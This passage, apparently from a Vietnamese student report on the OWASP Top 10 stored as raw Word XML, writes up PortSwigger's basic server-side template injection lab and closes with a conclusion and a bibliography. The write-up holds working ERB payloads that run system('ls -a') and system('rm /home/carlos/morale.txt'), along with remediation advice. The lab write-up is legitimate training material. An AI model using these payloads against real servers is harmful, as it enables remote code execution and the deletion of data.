        <w:t>Kiểm tra tính hợp lệ của quyền truy cập:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4C3E">
        <w:t xml:space="preserve"> Đảm bảo rằng các hành động yêu cầu quyền truy cập được kiểm tra tính hợp lệ và không thể được thực hiện mà không cần xác thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1623361E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc182429532"/>
      <w:bookmarkStart w:id="95" w:name="_Toc182909893"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>12: Basic server-side template injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="09BFAFC7" w14:textId="222C1504" w:rsidR="004F7CAE" w:rsidRDefault="004F7CAE" w:rsidP="00F67FB2">
      <w:hyperlink r:id="rId274" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="285823E7" w14:textId="4C1B3CB8" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="002351AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE" w:rsidRPr="004F7CAE">
        <w:t>Tồ</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t>n tại lỗ hổng Server-Side Template Injection (SSTI) cho phép kẻ tấn công thực hiện thực thi mã trên máy chủ bằng cách chèn các câu lệnh template vào các biến mẫu trên trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586619B3" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="007C6498" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4DE7D" w14:textId="209BF300" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="0051072D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F7CAE">
        <w:t>Truy cập vào task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500841EB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="0051072D" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0051072D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE80459" wp14:editId="15FBA73F">
            <wp:extent cx="6115050" cy="2683510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1168105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05763" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2683510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5AC69" w14:textId="19C617C6" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0051072D">
        <w:t>Sau đó kiểm tra trang web và phát hiện rằng URL không được lọc, điều này có thể dẫn đến lỗ hổng SSTI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B442265" w14:textId="706704A9" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>ực hiện tấn công như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE845E5" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Tham khảo solution của yêu cầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE4DCA" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0051072D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="724BD85A" wp14:editId="62B7E4F0">
            <wp:extent cx="6115050" cy="5460365"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="34510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0320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="5460365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="318B11EE" w14:textId="5A2A0348" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>hử nhập lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B9F3E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://0a0300ea036a70f283426e73008200c5.web-security-academy.net/?message =&lt;%25%3d+7*7+%25&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D58E7CF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="0051072D" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0051072D">
        <w:t>Sử dụng &lt;%25%3d+7*7+%25&gt; để tính toán 7 * 7 và hiển thị kết quả là 49.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1EBAF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051072D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43D6A8EC" wp14:editId="1D1B487E">
            <wp:extent cx="6115050" cy="3492500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="935213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13753" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId277"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3492500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B593C" w14:textId="4BF546B2" w:rsidR="00F67FB2" w:rsidRPr="004F7CAE" w:rsidRDefault="00F67FB2" w:rsidP="004F7CAE">
      <w:r w:rsidRPr="004F7CAE">
        <w:t>Tiếp theo thử với lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B49A3" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://0a0300ea036a70f283426e73008200c5.web-security-academy.net/?message=&lt;%= system("ls -a") %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E4A8D7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="0051072D" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0051072D">
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;%= system("ls -a") %&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0051072D">
        <w:t xml:space="preserve"> để thực thi lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ls -a</w:t>
      </w:r>
      <w:r w:rsidRPr="0051072D">
        <w:t xml:space="preserve"> và hiển thị các file và thư mục ẩn.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kết quả trả về là: </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. .. .bash_history .bash_logout .bashrc .profile morale.txt true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E038A" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0051072D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB8CCAF" wp14:editId="5E913747">
            <wp:extent cx="6115050" cy="3469005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="627851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51782" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId278"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3469005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="474AB141" w14:textId="2B156597" w:rsidR="00F67FB2" w:rsidRPr="00C22144" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C22144">
        <w:lastRenderedPageBreak/>
        <w:t>Tiếp theo</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C3E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C22144">
        <w:t>thực hiện lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177EE8A7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00C22144" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://0a0300ea036a70f283426e73008200c5.web-security-academy.net/?message=&lt;%= system("rm /home/carlos/morale.txt") %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB00091" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C22144">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00C22144">
        <w:t xml:space="preserve"> Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;%= system("rm /home/carlos/morale.txt") %&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22144">
        <w:t xml:space="preserve"> để xóa file </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>morale.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22144">
        <w:t xml:space="preserve"> trong thư mục </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/home/carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22144">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12B9D4" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C22144">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0402999B" wp14:editId="72CB779E">
            <wp:extent cx="6115050" cy="3491230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1778954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54979" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId279"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3491230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FDD4B" w14:textId="166F9BE5" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C22144">
        <w:t xml:space="preserve">Kết quả trả về là </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22144">
        <w:t xml:space="preserve"> và hoàn thành thử thách của lab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788979EF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C22144">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02B8DDF7" wp14:editId="0928000F">
            <wp:extent cx="6115050" cy="3512820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1284669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69942" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId280"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3512820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17B10C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mức độ ảnh hưởng của lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="00196257">
        <w:t>High (cao</w:t>
      </w:r>
      <w:r w:rsidRPr="002351AD">
        <w:t>) vì nó cho phép kẻ tấn công thực thi mã trên máy chủ, có thể dẫn đến việc lộ thông tin nhạy cảm hoặc tấn công tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFF081" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA41DB" w14:textId="6F27051E" w:rsidR="00F67FB2" w:rsidRPr="00A51CB9" w:rsidRDefault="00F67FB2" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A51CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lọc đầu vào:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51CB9">
        <w:t xml:space="preserve"> Thực hiện kiểm tra và lọc các đầu vào từ người dùng để loại bỏ các dấu hiệu của SSTI trước khi xử lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED42DA" w14:textId="44FFC435" w:rsidR="00F67FB2" w:rsidRPr="00A51CB9" w:rsidRDefault="00F67FB2" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A51CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sử dụng template engine an toàn:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51CB9">
        <w:t xml:space="preserve"> Sử dụng một template engine an toàn và cấu hình nó để không thực thi mã từ người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF78C5B" w14:textId="74820540" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A51CB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cập nhật và kiểm tra bảo mật định kỳ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51CB9">
        <w:t xml:space="preserve"> Đảm bảo rằng tất cả các thành phần phần mềm được cập nhật đều đặn và kiểm tra để loại bỏ hoặc sửa chữa các lỗ hổng bảo mật đã biết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D06EC6" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65369B76" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00A51CB9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc182909894"/>
      <w:r w:rsidRPr="00A51CB9">
        <w:lastRenderedPageBreak/>
        <w:t>TỔNG KẾT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="38B1D3DD" w14:textId="56016FE8" w:rsidR="009328B7" w:rsidRPr="009328B7" w:rsidRDefault="009328B7" w:rsidP="009328B7">
      <w:r w:rsidRPr="009328B7">
        <w:t>Đồ án đã giúp tôi phát triển không chỉ về kiến thức mà còn về kỹ năng thực hành như cách sử dụng công cụ Burp Suite, Kali Linux Tools,… trong lĩnh vực bảo mật ứng dụng web. Phân tích các lỗ hổng phổ biến từ danh sách OWASP Top 10 năm 2021 đã mang lại cái nhìn sâu sắc về các rủi ro bảo mật và tầm quan trọng của việc xây dựng hệ thống bảo vệ web hiệu quả. Các kịch bản tấn công mô phỏng đã giúp tôi nắm bắt cách thức kẻ tấn công lợi dụng các điểm yếu để xâm nhập vào hệ thống, đồng thời các biện pháp ngăn chặn đã cung cấp các giải pháp để giảm thiểu các nguy cơ bảo mật này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B396AD" w14:textId="3AE52E0A" w:rsidR="00F67FB2" w:rsidRPr="009328B7" w:rsidRDefault="009328B7" w:rsidP="009328B7">
      <w:r w:rsidRPr="009328B7">
        <w:t>Qua đồ án này, tôi mong muốn không chỉ thể hiện tiềm năng cá nhân mà còn khẳng định khả năng đóng góp vào công tác bảo mật cho các tổ chức. Đây là bước khởi đầu quan trọng để tôi có thể phát triển sâu hơn trong lĩnh vực an ninh mạng và sẵn sàng cho các thử thách và cơ hội trong tương lai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F73FE2" w14:textId="77777777" w:rsidR="00A51CB9" w:rsidRPr="009328B7" w:rsidRDefault="00A51CB9" w:rsidP="009328B7">
      <w:r w:rsidRPr="009328B7">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="97" w:name="_Toc182909895" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-657000399"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="1DE77E48" w14:textId="77777777" w:rsidR="00C931E7" w:rsidRPr="00A51CB9" w:rsidRDefault="00C931E7" w:rsidP="00C931E7">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:ind w:left="432" w:hanging="432"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r w:rsidRPr="00A51CB9">
            <w:t>TÀI LIỆU THAM KHẢO</w:t>
          </w:r>
          <w:bookmarkEnd w:id="97"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="11CC04A2" w14:textId="77777777" w:rsidR="009328B7" w:rsidRDefault="00C931E7" w:rsidP="009328B7">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:jc w:val="left"/>
                <w:rPr>
                  <w:noProof/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="009328B7">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>owasp.org</w:t>
              </w:r>
              <w:r w:rsidR="009328B7">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. (n.d.). Retrieved from https://owasp.org/www-project-top-ten/</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="5ADA85B4" w14:textId="77777777" w:rsidR="009328B7" w:rsidRDefault="009328B7" w:rsidP="009328B7">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:jc w:val="left"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>owasp.org</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. (n.d.). Retrieved from https://owasp.org/Top10/</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="0C4835D7" w14:textId="77777777" w:rsidR="009328B7" w:rsidRDefault="009328B7" w:rsidP="009328B7">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:jc w:val="left"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>sucuri.net</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. (n.d.). Retrieved from https://sucuri.net/guides/owasp_top_10_2021_edition/</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="189EF931" w14:textId="4E21E2BE" w:rsidR="00C931E7" w:rsidRDefault="00C931E7" w:rsidP="009328B7">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:jc w:val="left"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="23FAA4FB" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
